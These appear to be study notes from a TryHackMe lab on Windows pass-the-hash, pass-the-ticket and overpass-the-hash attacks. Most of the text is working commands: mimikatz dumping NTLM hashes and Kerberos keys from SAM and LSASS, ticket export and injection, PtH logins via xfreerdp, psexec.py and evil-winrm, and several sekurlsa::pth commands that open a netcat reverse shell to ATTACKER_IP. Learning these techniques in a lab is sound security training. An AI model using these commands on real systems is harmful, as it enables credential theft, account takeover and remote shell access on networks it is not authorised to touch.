Alternate Authentication Material

PRACTICE ! PRACTICE ! PRACTICE !

By alternate authentication material, we refer to any piece of data that can be used to access a Windows account without actually knowing a user's password itself

This is possible because of how some authentication protocols used by Windows networks work

• NTLM authentication

• Kerberos authentication

Pass The Hash Attacks

Extracting credentials from a host where we have attained administrative privileges (by using mimikatz), we might get clear-text passwords or hashes that can be easily cracked - If we aren't lucky enough we will end up with non-cracked NTLM password hashes

• Although it may seem we can't really use those hashes, the NTLM challenge sent during authentication can be responded to just by knowing the password hash

• This means we can authenticate without requiring the plaintext password to be known

• Instead of having to crack NTLM hashes, if the Windows domain is configured to use NTLM authentication, we can Pass-the-Hash (PtH) and authenticate successfully

To extract NTLM hashes, we can either use mimikatz to read the local SAM or extract hashes directly from LSASS memory

Extracting NTLM hashes from local SAM

This method will ONLY allow you to get hashes from local users on the machine

No domain user's hashes will be available

mimikatz # privilege::debug
mimikatz # token::elevate

mimikatz # lsadump::sam   
RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 145e02c50333951f71d13c245d352b50

Extracting NTLM hashes from LSASS memory

This method will let you extract any NTLM hashes for local users and any domain user that has recently logged onto the machine

mimikatz # privilege::debug
mimikatz # token::elevate

mimikatz # sekurlsa::msv 
Authentication Id : 0 ; 308124 (00000000:0004b39c)
Session           : RemoteInteractive from 2 
User Name         : bob.jenkins
Domain            : ZA
Logon Server      : THMDC
Logon Time        : 2022/04/22 09:55:02
SID               : S-1-5-21-3330634377-1326264276-632209373-4605
        msv :
         [00000003] Primary
         * Username : bob.jenkins
         * Domain   : ZA
         * NTLM     : 6b4a57f67805a663c818106dc0648484

We can then use the extracted hashes to perform a PtH attack by using mimikatz to inject an access token for the victim user on a reverse shell

mimikatz # token::revert
mimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"

Notice we used token::revert to re-establish our original token privileges, as trying to pass-the-hash with an elevated token won't work

This would be the equivalent of using runas /netonly but with a hash instead of a password and will spawn a new reverse shell from where we can launch any command as the victim user

Passing the Hash Using Linux

• Connect to RDP using PtH

xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH

• Connect via psexec using PtH

psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP

Note: Only the linux version of psexec support PtH.

• Connect to WinRM using PtH

evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH

Pass The Ticket Attacks

Sometimes it will be possible to extract Kerberos tickets and session keys from LSASS memory using mimikatz

The process usually requires us to have SYSTEM privileges on the attacked machine

mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

Notice that if we only had access to a ticket but not its corresponding session key, we wouldn't be able to use that ticket; therefore, both are necessary

Mimikatz can extract any TGT or TGS available from the memory of the LSASS process, most of the time, we'll be interested in TGTs as they can be used to request access to any services the user is allowed to access

• At the same time, TGSs are only good for a specific service - Extracting TGTs will require us to have administrator's credentials, and extracting TGSs can be done with a low-privileged account

Once we have extracted the desired ticket, we can inject the tickets into the current session with the following command

mimikatz # kerberos::ptt [0;427fcd5]-2-0-40e10000-Administrator@krbtgt-ZA.TRYHACKME.COM.kirbi

Injecting tickets in our own session doesn't require administrator privileges - After this, the tickets will be available for any tools we use for lateral movement

To check if the tickets were correctly injected, you can use the klist command

za\bob.jenkins@THMJMP2 C:\> klist

Current LogonId is 0:0x1e43562

Cached Tickets: (1)

#0>     Client: Administrator @ ZA.TRYHACKME.COM
        Server: krbtgt/ZA.TRYHACKME.COM @ ZA.TRYHACKME.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 4/12/2022 0:28:35 (local)
        End Time:   4/12/2022 10:28:35 (local)
        Renew Time: 4/23/2022 0:28:35 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: THMDC.za.tryhackme.com

Overpass-the-hash / Pass-the-Key

This kind of attack is similar to PtH but applied to Kerberos networks

When a user requests a TGT, they send a timestamp encrypted with an encryption key derived from their password

• The algorithm used to derive this key can be either DES, RC4, AES128 or AES256

• If we have any of those keys, we can ask the KDC for a TGT without requiring the actual password, hence the name Pass-the-key (PtK)

We can obtain the Kerberos encryption keys from memory by using mimikatz

mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys

Depending on the available keys, we can run the following commands on mimikatz to get a reverse shell via Pass-the-Key

If we have the RC4 hash

mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"

Notice that when using RC4, the key will be equal to the NTLM hash of a user - This means that if we could extract the NTLM hash, we can use it to request a TGT as long as RC4 is one of the enabled protocols

This particular variant is usually known as Overpass-the-Hash (OPtH)

If we have the AES128 hash

mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /aes128:b65ea8151f13a31d01377f5934bf3883 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"

If we have the AES256 hash

mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /aes256:b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"